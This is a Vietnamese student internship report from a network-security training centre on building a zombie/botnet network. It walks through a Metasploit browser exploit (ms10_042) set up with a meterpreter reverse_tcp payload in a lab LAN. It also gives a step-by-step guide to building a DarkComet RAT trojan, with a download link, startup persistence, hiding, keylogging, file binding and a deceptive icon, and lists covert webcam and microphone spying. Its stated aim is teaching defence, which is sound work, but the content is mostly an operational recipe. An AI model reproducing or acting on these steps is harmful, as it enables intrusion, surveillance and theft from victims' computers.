TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG

VÀ AN NINH MẠNG QUỐC TẾ

ATHENA

BÁO CÁO THỰC TẬP

ĐỀ TÀI: Nghiên cứu và triển khai mạng lưới zoombie , botnet trên hệ thống mạng

Giảng viên hướng dẫn : Võ Đỗ Thắng

Sinh viên thực hiện Nguyễn Hoài Huy

MỤC LỤC

LƠI MƠ ĐÂU 2

PHÂN 1 4

GIỚI THIỆU VỀ BACKTRACK 5 4

1. Giới thiệu..........................................................................................................4

2. Mục đích...........................................................................................................4

3. Cài đặt...............................................................................................................5

3.1 Live DVD...................................................................................................5

3.2 Install..........................................................................................................5

PHÂN 2 13

TRIỂN KHAI TRONG MÔI TRƯƠNG LAN 13

1. Mô phỏng mạng LAN.....................................................................................13

2. Scanning.........................................................................................................14

2.1 Network scanning....................................................................................15

2.2 Vulnerability scanning.............................................................................16

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang1

3. Penetration test (Pentest – Kiểm tra xâm nhập)..............................................17

4. Tạo virus.........................................................................................................19

PHÂN 3 20

ỨNG DỤNG TRÊN HỆ THỐNG HONEYPOT 20

1. Mô hình mạng của hệ thống Honeypot...........................................................20

2. Ràng buộc Domain name với địa chỉ IP public..............................................20

3. Cài Metasploit cho VPS..................................................................................21

4. Thực hiện kiểm soát từ xa...............................................................................21

KẾT LUẬN 32

TÀI LIỆU THAM KHẢO 33

LƠI MƠ ĐÂU

1. Sự cần thiết cua đê tài

Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed

Denial of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất. DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận và phục vụ các yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7 năm 2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập được trong nhiều tuần lễ liên tiếp. Theo thống kê từ Abort Network, đầu năm 2014 có hơn 100 vụ tấn công DDoS trên 100Gbps, 5733 vụ tấn công đạt 20Gbps gấp hơn hai lần năm 2013.

Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hàng triệu máy. Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang2

giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng ngừa sự phát triển của hệ thống zombie, botnet.

2. Muc tiêu nghiên cưu

Đề tài nghiên cứu trên hai môi trường:Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật

trên các máy trong mạng, thử xâm nhập trên các máy.Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phát

tán và điểu khiển mạng lưới botnet thông qua mạng Internet.

3. Phương phap nghiên cưu

Giai đoạn 1: Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt Backtrack trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới một mục tiêu.

Giai đoạn 2: Cài đặt và tạo bot trên VPS (Virtual Private Server) và phát tán trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public của VPS.

4. Kết câu đê tài

Phần 1: Giới thiệu vê Backtrack 5Phần 2: Triển khai trong môi trường LANPhần 3: Triển khai xây dựng botnet bằng DarkCometKết luân

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang3

PHÂN 1

GIỚI THIỆU VỀ BACKTRACK 5

1. Giới thiệu

Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào thử nghiệm thâm nhập: WHAX và Auditor Security Collection.

2. Muc đích

Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập. Các công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau :

1. Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên internet,mà không cần chạm vào môi trường mục tiêu.

2. Network mapping: loại này chứa một số công cụ có thể được sử dụng để có kiểm tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và cũng làm portscanning.

3. Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).

4. Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web.

5. Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID).

6. Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.

7. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.

8. Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang4

cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập.

9. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này.

10. Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.

11. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi.

3. Cài đặt

Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-linux.org/downloads/, có bản cho Vmware và file ISO.

1. Live DVD

Nếu chúng tamuốn sử dụng Backtrack mà không cần cài nó vào ổ cứng, chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD, và khởi động máy tính của chúng ta với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng Backtrack là một DVD Live là nó là rất dễ dàng để làm và chúng ta không cần phải gây rối với cấu hình máy hiện tại của chúng ta. Tuy nhiên, phương pháp này cũng có một số nhược điểm. Backtrack có thể không làm việc với phần cứng, và thay đổi cấu hình nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa DVD Live. Ngoài ra, nó là chậm, vì máy tính cần phải tải các chương trình từ đĩa DVD.

2. Install

1. Cài đặt trong máy thật

Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy Backtrack Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang5

toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack 5.

Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity. Sau đó cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng ta đang sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt.

2. Cài đặt trong máy ảo

Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử dụng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được wireless trừ USB wireless.

Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng được card mạng thật, ta phải chọn Netword là Briged

Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang6

Tạo một máy ảo mới và cho đia BackTrack vào

Giao diện khởi động của BackTrack

Gõ startx để vào chế độ đồ họa trong BackTrack

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang7

Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang8

Chọn ngôn ngữ, chọn Tiếp để tiếp tục

Chọn múi giờ, chọn Tiếp để tiếp tục

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang9

Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tục

Chọn phân vùng để cài, chọn Tiếp để tiếp tục

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang10

Nhấn Cài đặt để bắt đầu cài

Quá trình cài đã bắt đầu.

Sau khi hoàn tất, chúng ta khởi động lại

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang11

Switch

PC1 PC2 PC3

PHÂN 2

TRIỂN KHAI TRONG MÔI TRƯƠNG LAN

1. Mô phỏng mạng LAN

Mô hình mạng LAN được mô phỏng:

Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged

2. Thử nghiệm xâm nhâp bằng Metasploit

Trong Backtrack5r3, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập.

Để khởi động giao diện Console của Metasploit, trong Terminal, gõ lệnh

msfconsole.

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang12

Giao diện sau khi dùng lệnh

Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:use <Đường dẫn đến module>VD: khai thác lỗi ms10_042Sử dụng lệnh search ms10_042 để tìm ra moudle cần dùng

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang13

use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter

Các thiết lập:

set PAYLOAD windows/meterpreter/reverse_tcpset SRVHOST 192.168.1.101set LHOST 192.168.1.101exploit

Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc (http://192.168.1.101:80/), chỉ cần nạn nhân click vào link thì mã độc sẽ được gửi sang máy nạn nhân và sau đó có thể chiếm quyền máy.

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang14

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang15

PHÂN 3

XÂY DỰNG BOTNET BẰNG DARKCOMET

1. Giới thiệu DarkComet

DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất nổi tiếng, Tuy nhiên mình thấy Dark Comet là một soft đơn giản cực kì lợi hại và nguy hiểm, với các tính năng như:

+ Remote Desktop Như TeamViewer nhưng không cần sự đồng ý.+ Xem các thư mục của máy victim, ăn cắp tài liệu từ máy victim.+ Có thể tạo, đọc và xóa các thư mục trong máy victim.+ Xem lén Webcam của victim.+ Nghe trộm qua microphone của victim.+ Mở website bất kì mà không cần sự đồng ý của victim.+ Chat với victim (cái này fê phết, victim còn đíu tắt được cơ)+ Keylog có thể xem luôn hoặc về email.+ Xem regedit+ Có thể sử dung chức năng ctrl + alt + del, Task Manager+ Download file và chạy bình thường hoặc là ẩn ( Send sang máy victim thêm vài con trojan nữa chẳng hạn)+ Khởi động cùng win con trojan đó…

Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT v5.4.1 Legacy vào ngày 1/10/2012.

2. Cài đặt DarkComet

Bản darkcomet dùng trong báo cáo được tải từ:

http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar.

Chạy DarkComet trên linux:Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT dùng lệnh:

unzip darkcomet5.3.1RAT. Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT. Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang16

Giao diện quản lí các bot của DarkComet, chờ đợi các kết nối tới:

Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to new port(+Listen)Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận

Giao diện thêm socket lắng nghe

Ta có thể thêm cổng lắng nghe khác nếu muốn.

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang17

Tạo trojan: Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan:

- Download DarkComet v 531- Sau đó giải nén file DarkComet531RAT.zip- Vào thư mục giải nén, chạy file DarkComet.exe- Ch úng ta c ó 2 t ùy ch ọn. ch ọn option c ủa tro jan theo m ặc đ ịnh

(DarkComet -> Server module-> Minimalist) ho ặc t ùy ch ọn (DarkComet -> Server module-> Full Editor)

Giao diện tùy chọn:

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang18

- Các cài đặt:+ Main settings

- Password- server ID, - profile name- tùy chọn bypass tường lửa

+ Network SettingsCài đặt IP sẽ lắng nghe các bot và cổng lắng nghe của server.

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang19

+ Module Startup Tùy chọn bot có khởi động cùng Windows hay không.

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang20

+ Install MessageHiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy

chương trình bot hay không

+ Module Shield: Các tùy chọn giúp bot ẩn

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang21

+ KeyloggerTùy chọn ghi log bàn phím, địa chỉ tải log.

+ File BinderTùy chọn đính kèm file khác.

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang22

+ Choose IconTùy chọn một icon để tạo sự tin tưởng cho nạn nhân.

+ Stub FinalizationTùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif, .scr),

tùy chọn cách nén file trojan và lưu các cài đặt để sử dụng lại.

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang23

Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo trojan.Giao diện quản lí users:

Giao diện điều khiển user:

KẾT LUẬN

Từ khi ra đời đến nay, mạng internet luôn tiềm ẩn nguy các nguy cơ bảo mật. Tìm hiểu về mạng lưới zombie, botnet rất có ích cho người dùng phổ thông, giúp hạn chế nguy cơ bị biến thành botnet. Đề tài này càng có ít cho người quản trị hệ thống,

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang24

giúp hiểu rõ cơ chế hoạt động của mạng lưới zombie, botnet, từ đó đề ra các biện pháp phòng ngừa thích hợp.

TÀI LIỆU THAM KHẢO

1. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “TÀI LIỆU HƯỚNG DẪN VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ HỔNG MẠNG TẠI TRUNG TÂM ATHENA”

2. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng – Bí quyết và giải pháp”

3. Diễn đàn Athena, http://athena.edu.vn/forum/forum.php

4. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a- capital-v

Giảng viên hướng dẫn

Võ Đỗ Thắng

Trung tâm đào tạo Quản trị và An ninh mạng Athena Trang25